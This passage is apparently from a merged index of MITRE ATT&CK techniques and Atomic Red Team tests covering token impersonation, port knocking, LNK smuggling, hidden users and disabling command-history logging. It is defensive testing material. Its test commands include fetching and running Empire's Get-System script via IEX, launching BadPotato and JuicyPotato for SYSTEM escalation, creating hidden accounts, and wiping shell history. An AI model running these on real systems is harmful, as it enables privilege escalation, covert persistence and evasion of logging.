- Nick Carr, Mandiant
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
atomic_tests: []
T1134.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
created: '2020-02-18T16:39:06.289Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/001
external_id: T1134.001
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: DuplicateToken function
description: Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h).
Retrieved January 8, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:04.117Z'
name: 'Access Token Manipulation: Token Impersonation/Theft'
description: |-
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.
An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.
When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jonny Johnson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1134.001
atomic_tests:
- name: Named pipe client impersonation
auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
description: |-
Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: "`SeDebugPrivilege` token duplication"
auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
description: |-
Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
- name: Launch NSudo Executable
auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
description: |-
Launches the NSudo executable for a short period of time and then exits.
NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
supported_platforms:
- windows
input_arguments:
nsudo_path:
description: Path to the NSudoLG.exe file
type: path
default: PathToAtomicsFolder\T1134.001\bin\NSudoLG.exe
dependency_executor_name: powershell
dependencies:
- description: 'NSudoLG.exe must exist in the specified path #{nsudo_path}
'
prereq_command: 'if (Test-Path "#{nsudo_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Recurse -ErrorAction Ignore
executor:
command: |
Start-Process "#{nsudo_path}" -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
name: powershell
- name: Bad Potato
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
description: |-
https://github.com/BeichenDream/BadPotato
Privilege escalation using named pipe connections
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'BadPotato.exe must exist in the temp directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe" "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
executor:
command: |
cd "PathToAtomicsFolder\..\ExternalPayloads"
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
cleanup_command: 'taskkill /f /im notepad.exe
'
name: powershell
elevation_required: true
- name: Juicy Potato
auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
\nUpon successful execution of this test, a vulnerable CLSID will be used
to execute a process with system permissions.\nThis tactic has been previously
observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
supported_platforms:
- windows
input_arguments:
potato_path:
description: Path to the JuicyPotato.exe file
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
listening_port:
description: COM server listen port
type: integer
default: 7777
target_exe:
description: Target executable to launch with system privileges
type: path
default: "$env:windir\\system32\\notepad.exe"
target_CLSID:
description: Vulnerable CLSID to impersonate privileges
type: string
default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
dependency_executor_name: powershell
dependencies:
- description: 'JuicyPotato.exe must exist on disk
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
executor:
command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
-c ''#{target_CLSID}''
'
cleanup_command: |
get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
name: powershell
elevation_required: true
T1205.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
created: '2020-07-01T18:23:25.002Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1205/001
external_id: T1205.001
- source_name: Hartrell cd00r 2002
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:04.301Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1027.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc
created: '2023-09-29T15:28:42.409Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/012
external_id: T1027.012
- source_name: Unprotect Shortcut
description: Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved
October 3, 2023.
url: https://unprotect.it/technique/shortcut-hiding/
- source_name: Booby Trap Shortcut 2017
description: Weyne, F. (2017, April). Booby trap a shortcut with a backdoor.
Retrieved October 3, 2023.
url: https://www.uperesia.com/booby-trapped-shortcut
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:04.385Z'
name: LNK Icon Smuggling
description: "Adversaries may smuggle commands to download malicious payloads
past content filters by hiding them within otherwise seemingly benign windows
shortcut files. Windows shortcut files (.LNK) include many metadata fields,
including an icon location field (also known as the `IconEnvironmentDataBlock`)
designed to specify the path to an icon file that is to be displayed for the
LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata
to download malicious payloads. For example, adversaries have been observed
using LNK files as phishing payloads to deliver malware. Once invoked (e.g.,
[Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads
referenced via external URLs within the LNK icon location field may be downloaded.
These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System
Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments
within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation:
Booby Trap Shortcut 2017)\n\nLNK Icon Smuggling may also be utilized post
compromise, such as malicious scripts executing an LNK on an infected host
to download additional malicious payloads. \n"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Michael Raggi @aRtAGGI
- Andrew Northern, @ex_raritas
- Gregory Lesnewich, @greglesnewich
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1564.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d
created: '2020-03-13T20:12:40.876Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/002
external_id: T1564.002
- source_name: Cybereason OSX Pirrit
description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
December 10, 2021.
url: https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
- source_name: Apple Support Hide a User Account
description: Apple. (2020, November 30). Hide a user account in macOS. Retrieved
December 10, 2021.
url: https://support.apple.com/en-us/HT203998
- source_name: FireEye SMOKEDHAM June 2021
description: FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s
Supply Chain Software Compromise. Retrieved September 22, 2021.
url: https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
- source_name: Hide GDM User Accounts
description: Ji Mingkui. (2021, June 17). How to Hide All The User Accounts
in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.
url: https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/
- source_name: US-CERT TA18-074A
description: 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government
Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors.
Retrieved June 6, 2018.'
url: https://www.us-cert.gov/ncas/alerts/TA18-074A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:05.113Z'
name: 'Hide Artifacts: Hidden Users'
description: "Adversaries may use hidden users to hide the presence of user
accounts they create or modify. Administrators may want to hide users when
there are many user accounts on a given system or if they want to hide their
administrative or other management accounts from other users. \n\nIn macOS,
adversaries can create or modify a user to be hidden through manipulating
plist files, folder attributes, and user attributes. To prevent a user from
being shown on the login screen and in System Preferences, adversaries can
set the userID to be under 500 and set the key value Hide500Users
to TRUE in the /Library/Preferences/com.apple.loginwindow
plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated
with it. When the Hide500Users key value is set to TRUE,
users with a userID under 500 do not appear on the login screen and in System
Preferences. Using the command line, adversaries can use the dscl
utility to create hidden user accounts by setting the IsHidden
attribute to 1. Adversaries can also hide a user’s home folder
by changing the chflags to hidden.(Citation: Apple Support Hide
a User Account) \n\nAdversaries may similarly hide user accounts in Windows.
Adversaries can set the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList
Registry key value to 0 for a specific user to prevent that user
from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation:
US-CERT TA18-074A)\n\nOn Linux systems, adversaries may hide user accounts
from the login screen, also referred to as the greeter. The method an adversary
may use depends on which Display Manager the distribution is currently using.
For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts
may be hidden from the greeter using the gsettings command (ex:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Omkar Gudhate
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Windows
- Linux
x_mitre_version: '1.2'
identifier: T1564.002
atomic_tests:
- name: Create Hidden User using UniqueID < 500
auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507
description: 'Add a hidden user on macOS using Unique ID < 500 (users with that
ID are hidden by default)
'
supported_platforms:
- macos
input_arguments:
user_name:
description: username to add
type: string
default: APT
executor:
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
'
cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
'
elevation_required: true
name: sh
- name: Create Hidden User using IsHidden option
auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
description: 'Add a hidden user on macOS using IsHidden optoin
'
supported_platforms:
- macos
input_arguments:
user_name:
description: username to add
type: string
default: APT
executor:
command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1
'
cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
'
elevation_required: true
name: sh
- name: Create Hidden User in Registry
auto_generated_guid: 173126b7-afe4-45eb-8680-fa9f6400431c
description: |
Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.
Reference https://attack.mitre.org/techniques/T1564/002/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
supported_platforms:
- windows
input_arguments:
user_password:
description: Password for new user account
type: string
default: At0micRedTeam!
user_name:
description: Username
type: string
default: AtomicOperator
executor:
command: "NET USER #{user_name}$ #{user_password} /ADD /expires:never \nREG
ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\"
/v #{user_name}$ /t REG_DWORD /d 0\n"
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v #{user_name}$ /f >nul 2>&1
net user ${user_name}$ /delete >nul 2>&1
name: command_prompt
elevation_required: true
T1134.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819
created: '2020-02-18T18:03:37.481Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/003
external_id: T1134.003
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: LogonUserW function
description: Microsoft. (2023, March 10). LogonUserW function (winbase.h).
Retrieved January 8, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:05.200Z'
name: Make and Impersonate Token
description: |-
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jonny Johnson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1562.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59
created: '2020-02-21T20:56:06.498Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/003
external_id: T1562.003
- source_name: Google Cloud Threat Intelligence ESXi VIBs 2022
description: 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore.
(2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware
Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.'
url: https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence
- source_name: Sophos PowerShell command audit
description: jak. (2020, June 27). Live Discover - PowerShell command audit.
Retrieved August 21, 2020.
url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
- source_name: Microsoft PowerShell Command History
description: Microsoft. (2020, May 13). About History. Retrieved September
4, 2020.
url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
- source_name: Sophos PowerShell Command History Forensics
description: Vikas, S. (2020, August 26). PowerShell Command History Forensics.
Retrieved November 17, 2024.
url: https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:05.941Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
of the commands users type in their terminal so that users can retrace what
they've done. \n\nOn Linux and macOS, command history is tracked in a file
pointed to by the environment variable HISTFILE. When a user
logs off a system, this information is flushed to a file in the user's home
directory called ~/.bash_history. The HISTCONTROL
environment variable keeps track of what should be saved by the history
command and eventually into the ~/.bash_history file when a user
logs out. HISTCONTROL does not exist by default on macOS, but
can be set by the user and will be respected. The `HISTFILE` environment variable
is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence
ESXi VIBs 2022)\n\nAdversaries may clear the history environment variable
(unset HISTFILE) or set the command history size to zero (export
HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL
can be configured to ignore commands that start with a space by simply setting
it to \"ignorespace\". HISTCONTROL can also be set to ignore
duplicate commands by setting it to \"ignoredups\". In some Linux systems,
this is set by default to \"ignoreboth\" which covers both of the previous
examples. This means that “ ls” will not be saved, but “ls” would be saved
by history. Adversaries can abuse this to operate without leaving traces by
simply prepending a space to all of their terminal commands. \n\nOn Windows
systems, the PSReadLine module tracks commands used in all PowerShell
sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
by default). Adversaries may change where these logs are saved using Set-PSReadLineOption
-HistorySavePath {File Path}. This will cause ConsoleHost_history.txt
to stop receiving logs. Additionally, it is possible to turn off logging to
this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle
SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation:
Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History
Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
on network devices to disable historical command logging (e.g. no logging)."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vikas Singh, Sophos
- Emile Kenning, Sophos
- Austin Clark, @c2defense
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '2.3'
identifier: T1562.003
atomic_tests:
- name: Disable history collection
auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
description: 'Disables history collection in shells
'
supported_platforms:
- linux
- macos
input_arguments:
evil_command:
description: Command to run after shell history collection is disabled
type: string
default: whoami
executor:
command: |
export HISTCONTROL=ignoreboth
#{evil_command}
name: sh
- name: Disable history collection (freebsd)
auto_generated_guid: cada55b4-8251-4c60-819e-8ec1b33c9306
description: 'Disables history collection in shells
'
supported_platforms:
- linux
input_arguments:
evil_command:
description: Command to run after shell history collection is disabled
type: string
default: whoami
executor:
command: |
export HISTSIZE=0
#{evil_command}
name: sh
- name: Mac HISTCONTROL
auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
description: "The HISTCONTROL variable is set to ignore (not write to the history
file) command that are a duplicate of something already in the history \nand
commands that start with a space. This atomic sets this variable in the current
session and also writes it to the current user's ~/.bash_profile \nso that
it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n"
supported_platforms:
- macos
- linux
executor:
steps: |
1. export HISTCONTROL=ignoreboth
2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
3. ls
4. whoami > recon.txt
name: manual
- name: Clear bash history
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
description: "An attacker may clear the bash history cache and the history file
as their last act before logging off to remove the record of their command
line activities. \n\nIn this test we use the $HISTFILE variable throughout
to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
the file is empty 6 clear the history cache 7. confirm the history cache is
empty. This is when the attacker would logoff.\n"
supported_platforms:
- linux
executor:
name: bash
elevation_required: false
command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
[ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
- name: Setting the HISTCONTROL environment variable
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
description: "An attacker may exploit the space before a command (e.g. \" ls\")
or the duplicate command suppression feature in Bash history to prevent their
commands from being recorded in the history file or to obscure the order of
commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
the history cache 3. executes ls -la with a space in-front of it 4. confirms
that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
that their is only one command in history\n"
supported_platforms:
- linux
executor:
name: bash
elevation_required: false
command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
# \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
-la is not in history cache\"; fi\nif [ \"$HISTCONTROL\" != \"erasedups\"
]; then export HISTCONTROL=\"erasedups\"; fi\nhistory -c \nls -la $HISTFILE\nls
-la $HISTFILE\nls -la $HISTFILE\nif [ $(history |wc -l) -eq 2 ]; then echo
\"Their is only one entry for ls -la $HISTFILE\"; fi\n"
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
'
- name: Setting the HISTFILESIZE environment variable
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
description: |
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
supported_platforms:
- linux
executor:
name: bash
elevation_required: false
command: |
TEST=$(echo $HISTFILESIZE)
echo $HISTFILESIZE
export HISTFILESIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT"; fi
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
'
- name: Setting the HISTSIZE environment variable
auto_generated_guid: 386d3850-2ce7-4508-b56b-c0558922c814
description: |
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
echo $HISTSIZE
export HISTSIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTSIZE is not zero, history size is $HIST_LENGTH"; fi
cleanup_command: 'export HISTSIZE=100
'
- name: Setting the HISTFILE environment variable
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
description: |
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
